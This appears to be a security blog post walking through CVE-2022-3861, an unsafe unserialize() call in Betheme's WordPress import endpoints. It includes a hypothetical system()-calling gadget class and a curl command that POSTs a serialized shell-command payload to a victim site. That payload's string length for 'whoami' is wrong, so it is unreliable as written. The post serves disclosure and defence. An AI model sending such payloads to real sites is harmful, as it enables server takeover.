CVE-2022-3861 - How a PHP Object Injection in Betheme WordPress Theme Allows Site Takeover

Security in WordPress themes is often overlooked, putting millions of websites at risk. A great example of this is CVE-2022-3861, a critical vulnerability discovered in Betheme, one of the most popular premium WordPress themes. This flaw can let attackers with only contributor-level access run malicious code, steal sensitive data, or even delete files. In this deep dive, I'll break down how this vulnerability works, show some example code, and point out how real exploitation can happen.

Vulnerability Type: PHP Object Injection

- CVE ID: CVE-2022-3861

What Happened?

Betheme uses several AJAX endpoints for importing content. Specifically, functions like mfn_builder_import, mfn_builder_import_page, and importfromclipboard accept user input—parameters like import, mfn-items-import-page, mfn-items-import—and pass them straight to unserialize() in PHP, without proper sanitization or validation.

This allows “PHP Object Injection.” If an attacker can send specially crafted serialized data to these endpoints, they may be able to trigger pop (property-oriented programming) gadget chains that lead to serious consequences like arbitrary code execution.

How PHP Object Injection Works

PHP's unserialize() function takes a string and turns it back into an object or array. The trouble starts when you unserialize data from untrusted sources. Attackers can send malicious objects that, during deserialization, can execute methods (“magic methods” like __wakeup, __destruct, etc.)—sometimes with powerful side effects.

If code somewhere in Betheme (or elsewhere in WordPress) has a so-called POP chain—code that can be abused during this unserialization—then the attacker can:

Run arbitrary PHP code on the server

- Read/modify/delete files

Here’s a simplified version of what the vulnerable code might look like

// Example pseudocode from Betheme AJAX endpoint

function mfn_builder_import() {
    // $import_data comes directly from POST, without validation
    $import_data = $_POST['import'];

    // Dangerous: unserialize() on untrusted input
    $layout = unserialize($import_data);

    // Use $layout ...
}
add_action('wp_ajax_mfn_builder_import', 'mfn_builder_import');

If you can POST to this AJAX endpoint with contributor privileges, you could send your own serialized PHP object.

1. Identify a POP Chain

For a successful attack, a POP chain must be available on the site. WordPress core or plugins/themes sometimes contain these.

Suppose a gadget exists that could execute code if a certain object is deserialized

// A hypothetical vulnerable class
class EvilPayload {
    public $cmd;
    function __destruct() {
        // Dangerous! Will be executed on object destruction
        system($this->cmd);
    }
}

// Create malicious object
$payload = new EvilPayload();
$payload->cmd = 'id'; // or any shell command

// Serialize it for injection
$injection = serialize($payload);
// Result: O:11:"EvilPayload":1:{s:3:"cmd";s:2:"id";}

2. Send Malicious Payload

As a contributor, you'd use a tool like curl, Burp Suite, or a simple script to POST the serialized payload.

curl -X POST -d "action=mfn_builder_import&import=O:11:\"EvilPayload\":1:{s:3:\"cmd\";s:8:\"whoami\";}" \
     -b "wordpress_logged_in_cookie_here" \
     https://victim.site/wp-admin/admin-ajax.php

If the corresponding POP chain exists, your code will run as the web server user.

Real-World Impact

Since this exploit only requires contributor-level access, any low-privileged user or attacker exploiting leaked credentials can launch it. With Betheme installed on over 270,000 sites, this is a severe and widespread issue.

The vulnerability was responsibly reported.

- Betheme fixed the issue in version 26.5.1.5.

References

- NVD CVE-2022-3861
- Betheme Changelog
- Wordfence Post on Betheme Vulnerability

Limit user permissions. Don’t grant contributor access unless necessary.

- Harden your WordPress site by using application firewalls and disabling dangerous PHP functions when possible.

Summary

*CVE-2022-3861* shows how easy it is for a simple coding mistake (using unserialize on untrusted user input) to become a dangerous vulnerability in WordPress themes. If you use Betheme or similar products, always keep everything up-to-date and review your sites for potential low-privileged accounts that could be abused.

Timeline

Published on: 11/21/2022 13:15:00 UTC
Last modified on: 11/30/2022 15:31:00 UTC